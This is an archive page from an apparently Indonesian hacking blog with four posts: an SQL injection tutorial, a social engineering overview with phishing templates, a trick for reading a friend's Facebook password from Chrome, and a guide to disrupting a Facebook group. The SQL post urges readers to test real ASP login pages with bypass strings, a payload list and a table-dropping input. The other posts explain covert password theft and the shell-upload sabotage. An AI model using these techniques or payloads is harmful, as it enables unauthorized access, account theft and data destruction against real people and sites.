Tampilkan postingan dengan label Social Engineering. Tampilkan semua postingan
Tampilkan postingan dengan label Social Engineering. Tampilkan semua postingan

Kamis, 19 Juli 2012

DASAR DASAR SQL INJECTION



Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan 
kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke 'query' 
dengan cara manipulasi data input ke applikasi tsb.  
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,
disini gw cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan 
beberapa sql injection pada url.
Biasa Sql Injection dilakukan pada login page pada asp seperti di :
 admin\login.asp
 login.asp
Jadi yang akan menjadi target itu page tersebut ,
sekarang kita mulai aja dengan dasar-dasar sql injection :d.
Biasanya di sql statment 
 select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = 'echo' and password='password'
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser
Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near 'jopi' SQL atau "Structured Query Language" 
seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote 'breaks out' 
dari delimiter nya SQL  Jadi kalau misal ada inputan 
User: echo';drop table user--
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D
oh iya '--' merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.
Sekarang untuk lebih jelasnya kita secara langsung pada login script seperti
input login + password. Nama field nya 'login' dan 'pass'. dan 
SQL nya di asp: var sql = select * from users where username='"+login+"' and password='"+pass"'";
coba kalau ada inputan: login: ';drop table users-- pass: chfn (*wink* negative)
pasti ke drop tuh table users
Aduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja>
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau
admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin 
pass:' or 1=1--
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter :d
atau :
user:' or 1=1--
admin:' or 1=1--
Mas , ga bisa nich gimana ya ?
Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa
buat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter 
pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :
Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahan
pada addressnya seperti memasukan : test'1=1-- 
menjadi http://victim/index.asp?id=test'1=1--
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target
lalu kita tamhankan hidden field pada source tersebut sebagai contoh :
 
Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username. ingat script ini ditamhakna pd script yg sudah kalian download dr target . Variable ' or 1=1-- Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh pada sebuah web tertulis http://victim/index.asp?category=laptop Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb . Kalau ditulis dalam script ASP maka akan menjadi : v_cat = request("category") sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" set rs=conn.execute(sqlstr) Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi SELECT * FROM product WHERE PCategory='laptop' lalu apa hub dengan 'or 1=1--- coba kalau kita ganti http://victim/index.asp?category=laptop menjadi http://victim/index.asp?category=laptop'or 1=1-- Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi SELECT * FROM product WHERE PCategory='laptop' or 1=1--' artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkan Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page Kita bisa masuk kedalam login page tanpa password dan user name :d. Kemungkinan-kemungkinan variable lainya : or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection.
READ MORE →

Jumat, 01 Juni 2012

HUMAN MANIPULATION AND SOCIAL ENGINEERING





Kelemahan Manusia
Menurut definisi, “social engineering” adalah suatu teknik ‘pencurian’ atau pengambilan data
atau informasi penting/krusial/rahasia dari seseorang dengan cara menggunakan pendekatan
manusiawi melalui mekanisme interaksi sosial. Atau dengan kata lain social engineering
adalah suatu teknik memperoleh data/informasi rahasia dengan cara mengeksploitasi
kelemahan manusia. Contohnya kelemahan manusia yang dimaksud misalnya:
1. Rasa Takut – jika seorang pegawai atau karyawan dimintai data atau informasi dari
atasannya, polisi, atau penegak hukum yang lain, biasanya yang bersangkutan akan
langsung memberikan tanpa merasa sungkan;
2. Rasa Percaya – jika seorang individu dimintai data atau informasi dari teman baik,
rekan sejawat, sanak saudara, atau sekretaris, biasanya yang bersangkutan akan
langsung memberikannya tanpa harus merasa curiga; dan
3. Rasa Ingin Menolong – jika seseorang dimintai data atau informasi dari orang yang
sedang tertimpa musibah, dalam kesedihan yang mendalam, menjadi korban bencana,
atau berada dalam duka, biasanya yang bersangkutan akan langsung memberikan data
atau informasi yang diinginkan tanpa bertanya lebih dahulu.
Tipe Social Engineering
Pada dasarnya teknik social engineering dapat dibagi menjadi dua jenis, yaitu: berbasis
interaksi sosial dan berbasis interaksi komputer. 
Berikut adalah sejumlah teknik social
engineering yang biasa dipergunakan oleh kriminal, musuh, penjahat, penipu, atau mereka yang memiliki intensi tidak baik. 
Dalam skenario ini yang menjadi sasaran penipuan adalah
individu yang bekerja di divisi teknologi informasi perusahaan. Modus operandinya sama,yaitu melalui medium telepon.

Skenario 1 (Kedok sebagai User Penting)
Seorang penipu menelpon help desk bagian divisi teknologi informasi dan mengatakan hal
sebagai berikut “Halo, di sini pak Abraham, Direktur Keuangan. 
Saya mau log in tapi lupapassword saya. 
Boleh tolong beritahu sekarang agar saya dapat segera bekerja?”. 
Karena takut – dan merasa sedikit tersanjung karena untuk pertama kalinya dapat berbicara dan
mendengar suara Direktur Keuangan perusahaannya – yang bersangkutan langsung
memberikan password yang dimaksud tanpa rasa curiga sedikitpun. 
Si penipu bisa tahu nama
Direktur Keuangannya adalah Abraham karena melihat dari situs perusahaan.

Skenario 2 (Kedok sebagai User yang Sah)
Dengan mengaku sebagai rekan kerja dari departemen yang berbeda, seorang wanita menelepon staf junior teknologi informasi sambil berkata “Halo, ini Iwan ya? Wan, ini Septi dari Divisi Marketing, dulu kita satu grup waktu outing kantor di Cisarua. 
Bisa tolong bantu reset password-ku tidak? Dirubah saja menjadi tanggal lahirku. Aku takut ada orang yang tahu passwordku, sementara saat ini aku di luar kantor dan tidak bisa merubahnya. Bisa
bantu ya?”. 
Sang junior yang tahu persis setahun yang lalu merasa berjumpa Septi dalam acara kantor langsung melakukan yang diminta rekan sekerjanya tersebut tanpa melakukan
cek dan ricek. 
Sementara kriminal yang mengaku sebagai Septi mengetahui nama-nama
terkait dari majalah dinding “Aktivitas” yang dipajang di lobby perusahaan – dan nomor
telepon Iwan diketahuinya dari Satpam dan/atau receptionist.

Skenario 3 (Kedok sebagai Mitra Vendor)
Dalam hal ini penjahat yang mengaku sebagai mitra vendor menelepon bagian operasional
teknologi informasi dengan mengajak berbicara hal-hal yang bersifat teknis sebagai berikut:
“Pak Aryo, saya Ronald dari PT Teknik Alih Daya Abadi, yang membantu outsource file
CRM perusahaan Bapak. Hari ini kami ingin Bapak mencoba modul baru kami secara cumacuma. Boleh saya tahu username dan password Bapak agar dapat saya bantu instalasi dari tempat saya? Nanti kalau sudah terinstal, Bapak dapat mencoba fitur-fitur dan fasilitas canggih dari program CRM versi terbaru.” 
Merasa mendapatkan kesempatan, kepercayaan,dan penghargaan, yang bersangkutan langsung memberikan username dan passwordnya
kepada si penjahat tanpa merasa curiga sedikitpun. 
Sekali lagi sang penjahat bisa tahu namanama yang bersangkutan melalui berita-berita di koran dan majalah mengenai produk/jasa PT
Teknik Alih Daya Abadi dan nama-nama klien utamanya.

Skenario 4 (Kedok sebagai Konsultan Audit)
Kali ini seorang penipu menelpon Manajer Teknologi Informasi dengan menggunakan pendekatan sebagai berikut: “Selamat pagi Pak Basuki, nama saya Roni Setiadi, auditor
teknologi informasi eksternal yang ditunjuk perusahaan untuk melakukan validasi prosedur.
Sebagai seorang Manajer Teknologi Informasi, boleh saya tahu bagaimana cara Bapak melindungi website perusahaan agar tidak terkena serangan defacement dari hacker?”.
Merasa tertantang kompetensinya, dengan panjang lebar yang bersangkutan cerita mengenai struktur keamanan website yang diimplementasikan perusahaannya. 
Tentu saja sang kriminal tertawa dan sangat senang sekali mendengarkan bocoran kelemahan ini, sehingga
mempermudah yang bersangkutan dalam melakukan serangan.

Skenario 5 (Kedok sebagai Penegak Hukum)
Contoh terakhir ini adalah peristiwa klasik yang sering terjadi dan dipergunakan sebagai
pendekatan penjahat kepada calon korbannya: “Selamat sore Pak, kami dari Kepolisian yang
bekerjasama dengan Tim Insiden Keamanan Internet Nasional. 
Hasil monitoring kami memperlihatkan sedang ada serangan menuju server anda dari luar negeri. 
Kami bermaksud untuk melindunginya. 
Bisa tolong diberikan perincian kepada kami mengenai topologi dan
spesifikasi jaringan anda secara detail?”. 
Tentu saja yang bersangkutan biasanya langsungmemberikan informasi penting tersebut karena merasa takut untuk menanyakan keabsahan
atau keaslian identitas penelpon.
Sementara itu untuk jenis kedua, yaitu menggunakan komputer atau piranti elektronik/digital
lain sebagai alat bantu, cukup banyak modus operandi yang sering dipergunakan seperti:

Skenario 1 (Teknik Phishing – melalui Email)
Strategi ini adalah yang paling banyak dilakukan di negara berkembang seperti Indonesia.
Biasanya si penjahat menyamar sebagai pegawai atau karyawan sah yang merepresentasikan bank. 
Email yang dimaksud berbunyi misalnya sebagai berikut:
“Pelanggan Yth. 
Sehubungan sedang dilakukannya upgrade sistem teknologi
informasi di bank ini, maka agar anda tetap mendapatkan pelayanan perbankan yang prima,
mohon disampaikan kepada kami nomor rekening, username, dan password anda untuk kami perbaharui. 
Agar aman, lakukanlah dengan cara me-reply electronic mail ini. Terima kasih atas perhatian dan koordinasi anda sebagai pelanggan setia kami.
Wassalam,Manajer Teknologi Informasi”
Bagaimana caranya si penjahat tahu alamat email yang bersangkutan? Banyak cara yang dapat diambil, seperti: melakukan searching di internet, mendapatkan keterangan dari kartu nama, melihatnya dari anggota mailing list, dan lain sebagainya.

Skenario 2 (Teknik Phishing – melalui S MS)
Pengguna telepon genggam di Indonesia naik secara pesat. Sudah lebih dari 100 juta nomor terjual pada akhir tahun 2008. 
Pelaku kriminal kerap memanfaatkan fitur-fitur yang ada pada telepon genggam atau sejenisnya untuk melakukan social engineering seperti yang terlihat pada contoh SMS berikut ini:
“Selamat. Anda baru saja memenangkan hadiah sebesar Rp 25,000,000 dari Bank X yang bekerjasama dengan provider telekomunikasi Y. 
Agar kami dapat segera mentransfer uang tunai kemenangan ke rekening bank anda, mohon diinformasikan user name dan passoword internet bank anda kepada kami. 
Sekali lagi kami atas nama Manajemen Bank X mengucapkan selamat atas kemenangan anda…”

Skenario 3 (Teknik Phishing – melalui Pop Up Windows)
Ketika seseorang sedang berselancar di internet, tiba-tiba muncul sebuah “pop up window” yang bertuliskan sebagai berikut:
“Komputer anda telah terjangkiti virus yang sangat berbahaya. 
Untuk membersihkannya, tekanlah tombol BERSIHKAN di bawah ini.”
Tentu saja para awam tanpa pikir panjang langsung menekan tombol BERSIHK AN yang akibatnya justru sebaliknya, dimana penjahat berhasil mengambil alih komputer terkait yang dapat dimasukkan virus atau program mata-mata lainnya.
Jenis Social Engineering Lainnya Karena sifatnya yang sangat “manusiawi” dan memanfaatkan interaksi sosial, teknik-teknik memperoleh informasi rahasia berkembang secara sangat variatif. Beberapa contoh adalah
sebagai berikut:

1 Ketika seseorang memasukkan password di ATM atau di PC, yang bersangkutan “mengintip” dari belakang bahu sang korban, sehingga karakter passwordnya dapat terlihat;
2 Mengaduk-ngaduk tong sampah tempat pembuangan kertas atau dokumen kerja perusahaan untuk mendapatkan sejumlah informasi penting atau rahasia lainnya;
3 Menyamar menjadi “office boy” untuk dapat masuk bekerja ke dalam kantor manajemen atau pimpinan puncak perusahaan guna mencari informasi rahasia;
4 Ikut masuk ke dalam ruangan melalui pintu keamanan dengan cara “menguntit” individu atau mereka yang memiliki akses legal;
5 Mengatakan secara meyakinkan bahwa yang bersangkutan terlupa membawa ID-Card yang berfungsi sebagai kunci akses sehingga diberikan bantuan oleh satpam; 
6 Membantu membawakan dokumen atau tas atau notebook dari pimpinan dan
manajemen dimana pada saat lalai yang bersangkutan dapat memperoleh sejumlah informasi berharga; 
7 Melalui chatting di dunia maya, si penjahat mengajak ngobrol calon korban sambil pelan-pelan berusaha menguak sejumlah informasi berharga darinya;
8 Dengan menggunakan situs social networking – seperti facebook, myspace, friendster, dsb. – melakukan diskursus dan komunikasi yang pelan-pelan mengarah pada proses
“penelanjangan” informasi rahasia; dan lain sebagainya.
Target Korban Social Engineering Statistik memperlihatkan, bahwa ada 4 (empat) kelompok individu di perusahaan yang kerap menjadi korban tindakan social engineering, yaitu:

1. Receptionist dan/atau Help Desk sebuah perusahaan, karena merupakan pintu masuk ke dalam organisasi yang relatif memiliki data/informasi lengkap mengenai personel yang bekerja dalam lingkungan dimaksud;

2. Pendukung teknis dari divisi teknologi informasi – khususnya yang melayani pimpinan dan manajemen perusahaan, karena mereka biasanya memegang kunci akses penting ke data dan informasi rahasia, berharga, dan strategis;

3. Administrator sistem dan pengguna komputer, karena mereka memiliki otoritas untuk mengelola manajemen password dan account semua pengguna teknologi informasi di perusahaan; 

4. Mitra kerja atau vendor perusahaan yang menjadi target, karena mereka adalah pihak yang menyediakan berbagai teknologi beserta fitur dan kapabilitasnya yang dipergunakan oleh segenap manajemen dan karyawan perusahaan; 

5. Karyawan baru yang masih belum begitu paham mengenai prosedur standar keamanan informasi di perusahaan.
Solusi Menghindari Resiko Setelah mengetahui isu social engineering di atas, timbul pertanyaan mengenai bagaimana cara menghindarinya. Berdasarkan sejumlah pengalaman, berikut adalah hal-hal yang biasa
disarankan kepada mereka yang merupakan pemangku kepentingan aset-aset informasi penting perusahaan, yaitu:

6. Selalu hati-hati dan mawas diri dalam melakukan interaksi di dunia nyata maupun di dunia maya. Tidak ada salahnya perilaku “ekstra hati-hati” diterapkan di sini mengingat informasi merupakan aset sangat berharga yang dimiliki oleh organisasi atau perusahaan;

7. Organisasi atau perusahaan mengeluarkan sebuah buku saku berisi panduan mengamankan informasi yang mudah dimengerti dan diterapkan oleh pegawainya,untuk mengurangi insiden-insiden yang tidak diinginkan;

8. Belajar dari buku, seminar, televisi, internet, maupun pengalaman orang lain agar terhindar dari berbagai penipuan dengan menggunakan modus social engineering;

9. Pelatihan dan sosialisasi dari perusahaan ke karyawan dan unit-unit terkait mengenai pentingnya mengelola keamanan informasi melalui berbagai cara dan kiat;
10. Memasukkan unsur-unsur keamanan informasi dalam standar prosedur operasional sehari-hari – misalnya “clear table and monitor policy” - untuk memastikan semua pegawai melaksanakannya; dan lain sebagainya.
Selain usaha yang dilakukan individu tersebut, perusahaan atau organisasi yang bersangkutan perlu pula melakukan sejumlah usaha, seperti:
11. Melakukan analisa kerawanan sistem keamanan informasi yang ada di perusahaannya (baca: vulnerability analysis);
12. Mencoba melakukan uji coba ketangguhan keamanan dengan cara melakukan “penetration test”;

13. Mengembangkan kebijakan, peraturan, prosedur, proses, mekanisme, dan standar yang harus dipatuhi seluruh pemangku kepentingan dalam wilayah organisasi;

14. Menjalin kerjasama dengan pihak ketiga seperti vendor, ahli keamanan informasi, institusi penanganan insiden, dan lain sebagainya untuk menyelenggarakan berbagai program dan aktivitas bersama yang mempromosikan kebiasaan perduli pada keamanan informasi;

15. Membuat standar klasifikasi aset informasi berdasarkan tingkat kerahasiaan dan nilainya;

16. Melakukan audit secara berkala dan berkesinambungan terhadap infrastruktur dan suprastruktur perusahaan dalam menjalankan keamanan inforamsi; dan lain sebagainya.
READ MORE →

Selasa, 15 Mei 2012

CARA HACK FACEBOOK LEWAT GOOGLE CHROME

Penasaran alias pengen tahu password Facebook teman Anda ? trik rahasia cara mengetahui password atau kata sandi facebook temanberikut ini mungkin adalah cara paling jitu dan paling dahsyat,,!! untuk mendapatkannya dengan menggunakan Browser Google Chrome.
Syaratnya adalah:
1. Anjurkan teman Anda untuk Login/masuk ke Facebooknya dengan menggunakan browser Google Chrome.
2.Ketika teman Anda sudah akan selesai mengetikan username danpassword,JANGAN LUPA CENTANG ”BIARKAN SAYA TETAP MASUK sebelum dia Login.


3. Lalu biarkanlah teman Anda berfacebookan ria.

Naah inilah triknya jika ingin mengetahui passwordnya
cara-nya adalah:
1. Masuk Google Chrome lalu klik tombol/icon Obeng ( terletak pada Pojok kanan Atas) 


2. Lalu klik “PILIHAN”
3. Lalu klik “Tampilakan Sandi yang di simpan” seperti gambar di bawah

Trik Cara Mengetahui Password Facebook Teman Dengan Google Chrome
 4. Di situlah kita dapat melihat semua password dan dari situs mana saja kita login. Termasuk teman Anda 

Trik Cara Mengetahui Password Facebook Teman Dengan Google Chrome
5. Pergunakanlah Trik Cara Mengetahui Password Facebook Teman Dengan Google Chrome dengan bijak dan mohon trik tersebut tidak disalah gunakan
READ MORE →

Jumat, 11 Mei 2012

CARA DDOS FACEBOOK





Selamat Pagi,Siang,Sore,Malam,Subuh kawan-kawan

Pada kesempatan ini saya akan menulis Sedikit Tutorial cara DDOS Group di Facebook

Ini berawal dari kekesalan saya terhadap sebuah group game yang lumayan terkenal , di group tersebut terdapat banyak sekali user-user yang sama-sama bermain game tersebut

Pada suatu saat saya tidak setuju dengan keputusan Admin Group tersebut yang membatasi peraturan yang ada dalam group tersebut

Oleh karena itu saya berniat jahat untuk men-SABOTASE Peraturan itu dengan cara meng-DDOS group tersebut

Berikut Tutorialnya :

~# Siapkan seluruh rasa amarah dan rasa jengkel anda untuk melakukan ini Bingung

1.) Pertama masuklah kedalam Group yang menjadi sasaran DDOS anda
2.) Buatlah sebuah dokumen dengan nama terserah keinginan anda
3.) [*Penting] Pada kolom isi di dokumen tersebut silahkan anda masukkan (COPAS)SOURCE CODE dari Shell yang biasa kita pakai dalam melakukan aktifitas Hacking contoh c99, r57.dll
4.) Lalu save dokumen tersebut
5.) Setelah dokumen ter-SAVE maka bukalah Group tersebut dan lihat sudah mulai LEMOT atau BELUM
6.) Jika Group yang menjadi sasaran DDOS anda belum terkana EFFECT DDOSanda , maka lakukanlah Step nomor 2 , 3 dan 4 berulang-ulang[Rekor saya sampai 50 dokumen , Group RTO alias tidak bisa di buka]


hemm...
begitulah caranya men-DDOS sebuah Groups di Facebook
namun...
Saya akan meng-SHARE juga cara menanggulangi serangan DDOS Groups Facebook tersebut

Caranya sebagai berikut :

~# Kumpulkan jiwa pahlawan anda sebelum memulai aktifitas ini
~# Ini hanya bekerja jika anda menjadi Admin/Pengurus Group yang di DDOS

1.) Langsung saja buka m.facebook.com atau 0.facebook.com di Browser anda [Browser PC/Laptop loh ya , bukan Browser HaPe , karena kalo browser HaPe dipastikan gak bakalan kuat jalanin aktifitas ini]
2.) Setelah anda membuka Facebook dengan alamat m.facebook.com atau 0.facebook.com maka scroll ke bawah hingga menu bookmark dan pilihlah submenu GRUP
3.) Di dalam submenu Grup terdapat kumpulan-kumpulan Group tempat anda bergabung , lalu pilihlah Group anda yang di DDOS
4.) Bukalah Dokumen yang berisikan script SHELL yang di tulis oleh Attacker tersebut di Info -> Dokumen [Letak Dokumen ada di bawah]
5.) [*Penting] Setelah dibuka jangan cuma di plototin doang , tapi silahkan anda HAPUS Dokumen tersebut yang menyebabkan Groups anda ter-DDOS [Jangan pernah capek ya buat menghapusnya , karena biasanya dokumennya banyak]
6.) Mungkin hanya ini satu-satunya solusi untuk mengatasi serangan DDOS tersebut , karena jika anda membuka melalui http://www.facebook.com maka fitur HAPUS tidak ada

Sekian tutor dari saya , semoga tidak salah tempat , dan juga anda sampai tujuan dengan selamat [Emangnya ngamen di BIS]



thank to BossSarkem


tags : cara hack facebook 2013, cara hack facebook 2014, cara ddos facebook, cara hack akun facebook, cara hack password facebook, cara hack facebook 2013, cara hack facebook 2014, cara hack facebook 2013, cara hack facebook 2014, cara hack facebook 2013, cara hack facebook 2014cara hack facebook 2013, cara hack facebook 2014cara hack facebook 2013, cara hack facebook 2014, how to hack facebook 2013, hacker facebookCARA DDOS FACEBOOKCARA DDOS FACEBOOKCARA DDOS FACEBOOKCARA DDOS FACEBOOK .

READ MORE →